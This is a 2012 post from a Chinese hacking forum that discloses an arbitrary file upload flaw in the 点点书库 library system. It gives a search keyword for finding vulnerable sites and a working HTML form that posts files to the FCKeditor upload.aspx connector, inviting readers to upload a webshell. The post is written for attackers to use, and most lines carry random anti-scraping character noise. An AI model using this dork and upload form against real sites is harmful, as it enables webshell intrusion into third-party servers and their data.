找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 7577|回复: 0
打印 上一主题 下一主题

点点书库图书馆系统文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:20:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
主题:图书馆系统任意文件上传漏洞( q& _  o- H& y6 o: L
作者:冰锋刺客
% Q5 ]" Z6 y; T- U6 l/ W* V# D 厂商:点击书(dianjishu.com)
& o& E$ h: G8 Z* j5 e) A% e8 ` 日期:2012-6-21
  {3 m3 r8 `' c# u* J) R 3 L2 _' }6 e7 ?1 J9 ]8 S
I 概述4 r2 j$ U8 ~9 R5 g
   点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell. R0 ?: U- Z" Z1 _
II 简介( L/ ]# D: I; X' R( h. e2 ~
   关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
+ U; g( e" P' g7 O0 ` 补充一个漏洞
0 R5 k/ \8 m+ o1 u <form id="frmUpload" enctype="multipart/form-data"2 z" q0 M. m; B0 W! N' j
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
, ^/ v9 ^" C5 l' [ <input id="btnUpload" type="submit" value="操翻他">" V% \' h7 Z& p! e& O. w) ~
</form>4 p; v' ]$ c; P' R
你们懂的
9 K1 t" [# T; Y: l+ ^! @& G 那傻逼提供还需要改包.$ v/ ~/ s8 G2 b: i
自己看了下源代码发现fckeditor
1 C) ?& D/ Q3 I+ |7 S, S' s9 S) D 直接秒杀4 i, L( ~# ]8 C4 S  @8 o+ D9 a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表